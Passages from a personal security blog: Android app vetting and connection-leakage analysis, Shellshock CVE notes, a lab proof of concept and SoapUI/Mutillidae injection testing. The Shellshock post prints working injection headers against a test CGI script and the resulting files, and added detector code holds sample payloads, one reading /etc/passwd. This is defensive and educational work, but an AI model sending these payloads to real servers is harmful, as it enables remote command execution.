27 Jan 2015

My Android App Selections

Here are the criteria I use for selecting Android apps from the Google Play Store:

  1. I search for apps in the Google Play Store and review the detailed permissions (Permissions: View Details), or I search by permission (criterion: permission "INTERNET / Full network access" excluded) using the IzzyOnDroid site.
  2. The app must not request more privileges than it needs.
  3. Where possible, the app must not combine reading personal data (files, Google accounts, telephone number...) with network access (full network access), unless it comes from an authoritative source that I somewhat trust (Google, Mozilla/Firefox...).
  4. When the app has a legitimate need to connect to the Internet, it must not have shown signs of personal (or business) data leakage: connections to unknown addresses or domains, to monitoring sites (e.g. flurry.com) or to advertising sites (e.g. admob.com). I run it under NoRoot Firewall on a test device for a while, pull up the list of connections (IP addresses or domains) and draw my own conclusion. For target hosts where I only have an IP address, I use robtex.com to investigate further.
  5. The app must work well for my needs (fast, efficient, readable, adaptable). I much prefer to pay for an app that does what I need. Unfortunately, not many apps outside the Google realm meet the above criteria.
Click here to see a recent analysis. Below is my resulting shortlist.

My Apps Shortlist



App Name | Author | Purpose
Android Device Manager | Google | Remote wipe if device lost/stolen. Find device.
Authenticator | Google | 2-factor auth.
Calendar | Google | Calendaring
Camera | Google | Camera
Data ON-OFF | Antonio La Rocca | Mobile data toggle
Docs | Google | Doc viewer
Drive | Google | Cloud storage
Earth | Google | Mapping
English for Smart Keyboard PRO | Dexilog, LLC | Keyboard
Firefox | Mozilla | Web browsing
Fit | Google | Fitness tracking
French for Smart Keyboard PRO | Dexilog, LLC | Keyboard
Gmail | Google | Emailing
Google Play Books | Google | EPub reader. Google Play Books reader.
Google Play Music | Google | Music player
Google Play Newsstand | Google | News reading
Google Play services | Google | Android apps support
Google Play Store | Google | Android apps downloads
Google Text-to-speech Engine | Google | Text to speech
Hangouts | Google | Instant messaging
Hangouts Dialer | Google | Internet calling
Illico | Videotron | DVR control and TV schedule
illico.tv | Videotron | DVR control and TV schedule
illico.tv Plugin | Videotron | DVR control and TV schedule
JogTracker | Highway North Interactive | Fitness tracking
JogTracker Pro | Highway North Interactive | Fitness tracking
Keep | Google | Note taking
Maps | Google | Maps & GPS
My Account | Telus | Telus mobile account management
News & Weather | Google | News reading
NoRoot Firewall | Grey Shirts | Firewall
OI File Manager | OpenIntents | Directory browser
Orion Viewer | Michael Bogdanov | PDF reader
Screen Filter | Quatitative Labs | Reduce display brightness
Sheets | Google | Spreadsheets
Simple MP3 Folder Player | Jürgs App | Music player with dark widget (reviewing)
Slides | Google | Slide viewer
Smart Keyboard Pro | Dexilog, LLC | Keyboard
Solati Reader | Solati Labs | EPub reader (NB: no TOC)
Translate | Google | Language
VLC | Videolabs | Video and music player
YouTube | Google | Video and music player

3 Jan 2015

Data leakage analysis for Android

Below are a few ideas for analyzing the network connections that our Android apps try to initiate, without rooting the device. Tools mentioned: Android Connection Monitor (connection logs), NoRoot Firewall (connection logs and egress traffic control), tcpdump and tshark (DNS response logs) and Robtex (host reputation and purpose analysis).

The method described below should be seen as a first step, to identify which specific app connects to which server. The second step would be to analyze the traffic in detail with conventional tools such as Wireshark, an SSL interception proxy such as mitmproxy, etc. That is not covered here (yet), but this post gives very good ideas.

Connection Monitor

Start Connection Monitor

Install Connection Monitor on the Android device from Google Play, start the app and select the Connections Log tab:


Export Connection Logs

Let the app run for a while, then export its data by selecting the Settings tab and pressing Export Database and Send:


NoRoot Firewall

Start NoRoot Firewall

Install NoRoot Firewall (by Grey Shirts) from Google Play.

Start NoRoot Firewall, press Start and enable Auto start on boot:

Configure NoRoot Firewall

Configure access for each app in NoRoot Firewall from the Pending Access tab by selecting the app (do not press Allow or Deny at this point):



Accept or reject each granular network access based on common sense (minimum access needed) and/or by researching the destination on a site such as Robtex or SANS ISC.



After a few repetitions for the same domains or subnets, configure a generalized rule (but keep the individual entries for future analysis):



Repeat for all installed apps, iteratively, during normal daily use. Eventually most apps will be configured as wanted, allowing only the traffic you choose to let through, to the appropriate domains, based on your own research.


The following paragraphs show how to extract the NoRoot Firewall configuration in order to view it on a PC (or even transfer it to another Android device).

Backup data to PC

Turn on USB debugging on the Android device:

Connect the PC to the device over USB and use adb (macOS example) to back up the NoRoot Firewall data. On the device, press OK when prompted:
(macos)$ adb backup -f norootfw.ab app.greyshirts.firewall
Now unlock your device and confirm the backup operation.
 


Extract rules from NoRoot Firewall
Download Android Backup Extractor. Then unpack the backup file and extract the resulting tar archive:
(macos)$ java -jar abe.jar unpack norootfw.ab norootfw.tar
Strong AES encryption not allowed
Magic: ANDROID BACKUP
Version: 3
Compressed: 1
Algorithm: none

203264 bytes written to norootfw.tar.
(macos)$ tar xvf norootfw.tar
x apps/app.greyshirts.firewall/_manifest
x apps/app.greyshirts.firewall/f/persistentlog.txt
x apps/app.greyshirts.firewall/db/db-journal
x apps/app.greyshirts.firewall/db/db
x apps/app.greyshirts.firewall/sp/PREF.xml
Extract the data from the NoRoot Firewall database with sqlite3:
$ cd apps/app.greyshirts.firewall/db
$ sqlite3 db
SQLite version 3.7.13 2012-07-17 17:46:21
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .schema
CREATE TABLE android_metadata (locale TEXT);
CREATE TABLE app (appName TEXT, pkg1Name TEXT, appType INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
CREATE TABLE filter (serverIp TEXT, serverStrType INTEGER, serverPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, type INTEGER DEFAULT 0, type1 INTEGER DEFAULT 0, appName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, isPolicy INTEGER, appUid INTEGER, priority INTEGER DEFAULT 0, _id INTEGER PRIMARY KEY AUTOINCREMENT );
CREATE TABLE pending (serverIp TEXT, serverHost TEXT, serverPort INTEGER, localIp TEXT, localPort INTEGER, protocol INTEGER, serverName TEXT, createdData INTEGER, appName TEXT, allAppName TEXT, pkgName TEXT, pkg2Name TEXT, pkg3Name TEXT, appUid INTEGER, _id INTEGER PRIMARY KEY AUTOINCREMENT );
CREATE INDEX filter_pkg1 ON filter(pkgName);
CREATE INDEX filter_pkg2 ON filter(pkg2Name);
CREATE INDEX filter_pkg3 ON filter(pkg3Name);
CREATE INDEX pend_pkg1 ON pending(pkgName);
CREATE INDEX pend_pkg2 ON pending(pkg2Name);
CREATE INDEX pend_pkg3 ON pending(pkg3Name);


sqlite> select appName,serverIp,serverPort from filter order by appName;
Aldiko Premium|*|-1
Aldiko Premium|static.86.130.76.144.clients.your-server.de|80
Aldiko Premium|hit-block.opendns.com|443
Android System|192.168.22.1|7
Android System|*.cloudfront.net|80
Android System|cache.google.com|80
Android System|*|-1
Calendar|*.1e100.net|443
Calendar|64.233.*.*|443
Calendar|64.233.171.95|443
Calendar|qg-in-f95.1e100.net|443
[...]


sqlite> .output filter.txt
sqlite> select appName,serverIp,serverPort from filter order by appName;


sqlite> .output dump.sql
sqlite> .dump

DNS Resolution History

Full list of DNS mappings

To obtain a full list of the DNS name to IP address mappings seen on the network, run tcpdump for a while to capture the DNS traffic, then extract the mappings with tshark:
(Linux OS) # tcpdump -n -i eth1 -w dns1.pcap port 53 &
(attendre quelques heures  |  wait a few hours)
(Linux OS) # tshark -nr dns1.pcap -Y "(dns.flags.response == 1) && (dns.qry.type == 1)" -T fields -e dns.qry.name -e dns.resp.addr | head

Running as user "root" and group "root". This could be dangerous.
nrdp.nccp.netflix.com    107.21.213.110
myip.opendns.com    166.62.205.221
googlemail.l.google.com    74.125.226.21,74.125.226.22
nrdp.nccp.netflix.com    50.17.199.72
www.jourzero.com    173.194.68.121
nrdp.nccp.netflix.com    184.73.164.236
www.jourzero.com    64.233.171.121
myip.opendns.com    166.62.205.221
nrdp.nccp.netflix.com    184.73.248.203
cdn0.nflximg.net    24.200.246.83,24.200.246.57

Reputation Analysis

Robtex.com

The robtex.com site is a very useful tool that aggregates analysis data from various sources (whois, blacklists, DNS, multi-hosting...). Simply going to the main page and initiating a search from the top input form will get you what you need.

You can also use direct URIs such as http://robtex.com/ip/8.8.8.8.html (IP address lookup) or http://robtex.com/dns/www.hp.com (FQDN lookup).

There is also a nice little trick, described below, for getting colored links and details on hover...

Integration with Robtex

When displaying our analysis results, we can integrate them with Robtex data as described here. This gives active links, colored according to reputation, with details on hover. The next section shows an example.

Putting it all together

Of course, a good part of the steps above can be simplified and automated. For now, I have only done a bit of scripting to output the following sample results, for connections that may be worth looking into...

App Name | Host Name | IP Address | Port
Aldiko Premium | www.aldiko.co | 184.168.221.19 | 80
 | (probably data.flurry.com) | 216.52.203.13 | 443
 | (probably data.flurry.com) | 74.217.75.110 | 443
 | static.86.130.76.144.clients.your-server.de | 144.76.130.86 | 80
Google Play Newsstand | bs.serving-sys.com |  | 80
iSyncr | ec2-174-129-19-57.compute-1.amazonaws.com |  | 443


NB: if the IP addresses above are not colored or hovering does not work, the JavaScript from robtex.com may be blocked locally (e.g. by NoScript), or your client may be temporarily blacklisted by the service (e.g. if you reload this page too often). If that happens, try again later.
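The scripting step above is not shown on the page, so here is an added example (my own, not the author's script) that joins the three data sources this post collects: the NoRoot Firewall `filter` table (created below with the exact schema printed by `.schema` above), the tab-separated `tshark -T fields` DNS output, and the direct Robtex URI forms. Bare IP rules are resolved back to names through the DNS history, then each destination is classified against a small watch-list; flurry.com and admob.com come from the selection criteria above, while the hosting suffixes and the sample rules and DNS lines are constructed for the demo.

```python
import re
import sqlite3
from collections import defaultdict

# Watch-lists (assumed, extend as needed): flurry.com and admob.com are the
# monitoring/advertising examples given in the criteria above; the hosting
# suffixes are CDN/PTR names that hide the real owner of the destination.
TRACKER_SUFFIXES = ("flurry.com", "admob.com")
HOSTING_SUFFIXES = ("amazonaws.com", "cloudfront.net", "your-server.de")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# The `filter` table exactly as printed by `.schema` above.
FILTER_SCHEMA = (
    "CREATE TABLE filter (serverIp TEXT, serverStrType INTEGER, serverPort INTEGER,"
    " protocol INTEGER, serverName TEXT, createdData INTEGER, type INTEGER DEFAULT 0,"
    " type1 INTEGER DEFAULT 0, appName TEXT, pkgName TEXT, pkg2Name TEXT,"
    " pkg3Name TEXT, isPolicy INTEGER, appUid INTEGER, priority INTEGER DEFAULT 0,"
    " _id INTEGER PRIMARY KEY AUTOINCREMENT)"
)

# Constructed rules (appName, serverIp, serverPort), in the shape of the
# `select appName,serverIp,serverPort from filter` output above.
SAMPLE_RULES = [
    ("Aldiko Premium", "*", -1),
    ("Aldiko Premium", "static.86.130.76.144.clients.your-server.de", 80),
    ("Aldiko Premium", "hit-block.opendns.com", 443),
    ("Aldiko Premium", "216.52.203.13", 443),
    ("Android System", "*.cloudfront.net", 80),
    ("Calendar", "64.233.171.95", 443),
    ("Calendar", "64.233.*.*", 443),
]

# Constructed `tshark -T fields -e dns.qry.name -e dns.resp.addr` output: tab
# separated, several addresses comma separated, plus tshark's stderr warning
# that lands in the file when both streams are redirected together.
SAMPLE_DNS = """Running as user "root" and group "root". This could be dangerous.
googlemail.l.google.com\t74.125.226.21,74.125.226.22
calendar.google.com\t64.233.171.95
data.flurry.com\t216.52.203.13
"""


def build_sample_db():
    """In-memory stand-in for apps/app.greyshirts.firewall/db/db."""
    conn = sqlite3.connect(":memory:")
    conn.execute(FILTER_SCHEMA)
    conn.executemany("INSERT INTO filter (appName, serverIp, serverPort)"
                     " VALUES (?, ?, ?)", SAMPLE_RULES)
    return conn


def parse_tshark_dns(text):
    """Invert the tshark output into ip -> {names that resolved to it}."""
    ip_to_names = defaultdict(set)
    for line in text.splitlines():
        parts = line.split("\t")
        if len(parts) != 2:
            continue  # warning lines, or queries without an A answer
        for ip in parts[1].split(","):
            if IPV4.match(ip):
                ip_to_names[ip].add(parts[0])
    return ip_to_names


def robtex_url(target):
    """Direct Robtex URI, in the IP or FQDN form shown above."""
    if IPV4.match(target):
        return "http://robtex.com/ip/%s.html" % target
    return "http://robtex.com/dns/%s" % target


def _has_suffix(name, suffixes):
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in suffixes)


def classify(server, ip_to_names):
    """Return (verdict, dns_names) for one rule's destination."""
    if server == "*":
        return "allow-all rule: review", []
    if "*" in server:
        return "generalized rule", []
    if IPV4.match(server):
        names = sorted(ip_to_names.get(server, ()))
        if not names:
            return "bare IP with no DNS history: investigate", []
        if any(_has_suffix(n, TRACKER_SUFFIXES) for n in names):
            return "tracker/ad host", names
        return "resolved from DNS history", names
    if _has_suffix(server, TRACKER_SUFFIXES):
        return "tracker/ad host", []
    if _has_suffix(server, HOSTING_SUFFIXES):
        return "generic hosting name: identify the owner", []
    return "named host", []


def analyze(conn, dns_text):
    """Join each firewall rule with DNS history and a Robtex lookup link."""
    ip_to_names = parse_tshark_dns(dns_text)
    findings = []
    query = "SELECT appName, serverIp, serverPort FROM filter ORDER BY appName, serverIp"
    for app, server, port in conn.execute(query):
        verdict, names = classify(server, ip_to_names)
        findings.append({"app": app, "target": server, "port": port, "verdict": verdict,
                         "dns_names": names,
                         "robtex": None if "*" in server else robtex_url(server)})
    return findings


if __name__ == "__main__":
    quiet = ("generalized rule", "named host", "resolved from DNS history")
    for f in analyze(build_sample_db(), SAMPLE_DNS):
        if f["verdict"] in quiet:
            continue  # print only what deserves a look
        print("%-15s %-45s %5s  %s" % (f["app"], f["target"], f["port"], f["verdict"]))
        print(" " * 16 + "%s  %s" % (f["robtex"] or "", ", ".join(f["dns_names"])))
```

To run it against a real extraction, replace `build_sample_db()` with `sqlite3.connect("apps/app.greyshirts.firewall/db/db")` and feed the saved tshark output to `analyze()`. The join only works for IPs that were resolved while tcpdump was running, which is why the DNS capture should run for the same period as the firewall logging.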


29 Sep 2014

Current Intel on BashBug / Shellshock

CVEs
CVE-2014-6271  (1st bug report)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-7169   (2nd bug/variant, aka AfterShock)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

CVE-2014-7186   (3rd bug/variant found by Red Hat's Florian Weimer)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186
The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the "redir_stack" issue.

CVE-2014-7187    (4th bug/variant found by Red Hat's Florian Weimer)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187
Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the "word_lineno" issue.

CVE-2014-6277   (5th bug/variant found by Google's Michal Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277
Variant 1. GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.

CVE-2014-6278   (6th bug/variant found by Google's Michal Zalewski)
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278   (reserved, not available yet)
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
Variant 2. (see Variant 1 CVE-2014-6277 for a description)

From SANS Advisory Board: Only the first two listed above are patched in "mainstream" Linux distros. A source code patch is available for the rest if you want to compile bash yourself, but exploitation is a tad harder for the last 4.

Other Info
GNU Patch Info
List for current bash (4.3): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/
Latest bash patch (027): http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027

Botnets

Network Detection (IDS, IPS, WAF)
  • VRT and EmergingThreats posts showing this is being addressed for Snort
  • ...
Exploits

Bash Test Strings
Command-line tests to verify proper patching (and possibly to reuse in our detections):
  • Early patch: env x='() { :;}; echo Not patched' bash -c "echo This is a test."
  • Later patch: foo='() { echo Not patched; }' bash -c foo
  • (search for more...)
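The detection side of the IDS/WAF bullet and the test strings above, as an added example that is not part of the original post: bash only tries to import a function from an environment variable whose value begins with the four characters "() {", so every environment-variable vector for the CVEs above shares that prefix, and that is what a detector looks for. The regex tolerates whitespace between the tokens, as the published signatures do, and is also tried on the URL-decoded value so that scanning attempts through a query string are caught. The raw request is the one shown in the 25 Sep 2014 post below; the access-log lines (Apache combined format, a detail assumed here) are constructed.

```python
import re
from urllib.parse import unquote

# bash imports a function only from a value starting with "() {"; tolerate
# whitespace between the tokens and check the URL-decoded form as well.
SHELLSHOCK = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format. The Cookie header is not logged, so a cookie
# payload needs request-header logging or an IDS/WAF in front of the server.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"'
)

# Constructed sample: the attacker request from the POC post below.
SAMPLE_REQUEST = "\r\n".join([
    "GET /cgi-bin/echo.sh HTTP/1.1",
    "Host: localhost",
    "User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie",
    "Connection: keep-alive",
    "", "",
])

# Constructed sample access-log lines: payload in User-Agent, a URL-encoded
# attempt in the query string, a benign request, and a payload in Referer.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2014:23:42:53 +0000] "GET /cgi-bin/echo.sh HTTP/1.1" '
    '200 1866 "-" "() { :;}; echo Hacked > /tmp/HackedViaUserAgent"',
    '203.0.113.7 - - [25/Sep/2014:23:43:10 +0000] '
    '"GET /cgi-bin/echo.sh?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 200 1866 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [25/Sep/2014:23:44:00 +0000] "GET /index.html HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.9 - - [25/Sep/2014:23:45:00 +0000] "GET /cgi-bin/echo.sh HTTP/1.1" '
    '200 1866 "() { :;}; /bin/cat /etc/passwd" "curl/7.30.0"',
]


def is_shellshock(value):
    """True if a header or parameter value carries the function-definition prefix."""
    return bool(SHELLSHOCK.search(value) or SHELLSHOCK.search(unquote(value)))


def scan_request(raw_request):
    """Return [(header_name, value)] for each suspicious header or request target."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    hits = []
    target = lines[0].split(" ")
    if len(target) >= 2 and is_shellshock(target[1]):
        hits.append(("request-target", target[1]))
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        if is_shellshock(value.strip()):
            hits.append((name.strip(), value.strip()))
    return hits


def scan_access_log(lines):
    """Return one event per suspicious field in combined-format log lines."""
    events = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue
        for field in ("request", "referer", "user_agent"):
            if is_shellshock(m.group(field)):
                events.append({"ip": m.group("ip"), "time": m.group("time"),
                               "field": field, "value": m.group(field)})
    return events


if __name__ == "__main__":
    for name, value in scan_request(SAMPLE_REQUEST):
        print("request header %s: %s" % (name, value))
    for ev in scan_access_log(SAMPLE_LOG):
        print("%(time)s %(ip)s %(field)s: %(value)s" % ev)
```

The pattern is specific enough to produce few false positives in header and log data (a JavaScript `function(){` in a Referer is the main one to expect). Matching the decoded form catches attempts, not necessarily successful exploitation: CGI hands the query string to the script still URL-encoded, so a payload has to reach bash unencoded through a header or another decoded field.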

25 Sep 2014

POC for ShellShock / BashBug CVE-2014-6271

Ref CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

I tried it real quick in a VM and it's easy to inject via the User-Agent and Cookie headers. I didn't get much result via a GET parameter, though (either via URL encoding or by just encoding spaces), but I just wanted to prove the point for myself quickly...


Simple CGI Script on a vulnerable server

/usr/lib/cgi-bin$ cat echo.sh
#!/bin/bash
echo -e "Content-type: text/plain\n\n"
echo "hi ya! Is there a file in /tmp as a result of this?";
echo "Output from env:"
env



GET request from attacker

GET /cgi-bin/echo.sh HTTP/1.1
Host: localhost
Content-Length: 0
User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie
Connection: keep-alive




GET response received by attacker

HTTP/1.1 200 OK
Date: Thu, 25 Sep 2014 23:42:53 GMT
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 1866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

hi ya! Is there a file in /tmp as a result of this?
Output from env:
[...]
HTTP_USER_AGENT=() { :
}
HTTP_COOKIE=() { :
}
_=/usr/bin/env



Result on attacked server

$ ls /tmp/Hacked*
/tmp/HackedViaCookie /tmp/HackedViaUserAgent

1 May 2014

Getting started in web services testing with SoapUI and Mutillidae


This post is meant to help a security tester get started with SoapUI for checking the security of SOAP web services: first set up Mutillidae, which includes a few web services to test, load them into SoapUI, then run a SQL injection test against them.

Setting up a local test environment with web services

Setting up SoapUI

  • Set up SoapUI, create a test project for Mutillidae, load the various Mutillidae WSDL files and set up the associated test suites for each WSDL:
  •  As a simple test, double click getUserInformation and add username and password values as follows: 


  •   Click on the green Submit Request button and wait for the response in the right pane:
 


  Creating a security test

  •   Create a new Security Test:

  • Optionally, add another specific assertion, as demonstrated below.

Note that an XPath assertion is not always a good idea for injection testing; at the very least, you have to make sure the assertion covers every legitimate case. For example, below we add an XPath expression that covers both a normal request (node count = 1) and an empty result set (node count = 0); a response that returns more rows than that, the usual sign of a successful injection, fails the assertion.
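An added example of the node-count check described above, written in Python rather than as a SoapUI assertion (it is not SoapUI's code or the author's). The envelope layout, the `account` element name and the three responses are assumptions constructed for the demo; Mutillidae's real getUserInformation response may use other names, so adapt the tag and the XPath. The count is computed with ElementTree; the equivalent SoapUI XPath Match assertion is given in the comment.

```python
import xml.etree.ElementTree as ET

# Assumed response layout. The SoapUI XPath Match assertion equivalent of
# xpath_count_assertion() below is roughly:
#   count(//*:account) = 1 or count(//*:account) = 0      expected: true
TAG = "account"


def soap_response(accounts):
    """Constructed SOAP envelope with one <account> element per returned row."""
    rows = "".join(
        "<account><username>%s</username><password>%s</password></account>" % row
        for row in accounts
    )
    return (
        '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
        "<soap:Body><getUserInformationResponse>%s</getUserInformationResponse>"
        "</soap:Body></soap:Envelope>" % rows
    )


# Constructed cases: a normal lookup, a wrong password, and a classic
# ' or '1'='1 injection that makes the backing query return every account.
NORMAL = soap_response([("admin", "adminpass")])
EMPTY = soap_response([])
INJECTED = soap_response([("admin", "adminpass"), ("adrian", "somepassword"),
                          ("john", "monkey")])


def count_nodes(xml_text, tag=TAG):
    """Namespace-agnostic count(//tag): the value the XPath assertion compares."""
    root = ET.fromstring(xml_text)
    return sum(1 for el in root.iter() if el.tag.rsplit("}", 1)[-1] == tag)


def xpath_count_assertion(xml_text, allowed=(0, 1), tag=TAG):
    """Pass only when the row count is one of the legitimate values."""
    return count_nodes(xml_text, tag) in allowed


def run_cases(cases, allowed=(0, 1)):
    """Evaluate the assertion over named responses, as a security test run would."""
    return {name: xpath_count_assertion(xml, allowed) for name, xml in cases.items()}


if __name__ == "__main__":
    cases = {"normal": NORMAL, "empty result set": EMPTY, "injection": INJECTED}
    for name, ok in run_cases(cases).items():
        print("%-17s %s" % (name, "PASS" if ok else "FAIL (unexpected row count)"))
    # An assertion that only accepts count = 1 fails on a legitimate empty
    # result, which is the incomplete-coverage case the text above warns about.
    print("count = 1 only, empty result:", run_cases(cases, allowed=(1,))["empty result set"])
```

The last line is the point of the caveat: with `allowed=(1,)` a failed login (zero rows) is reported as a finding, so the security scan produces noise, while with `allowed=(0, 1)` only the injected response, which dumps three accounts, fails.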

  Running the test


  Inspecting the results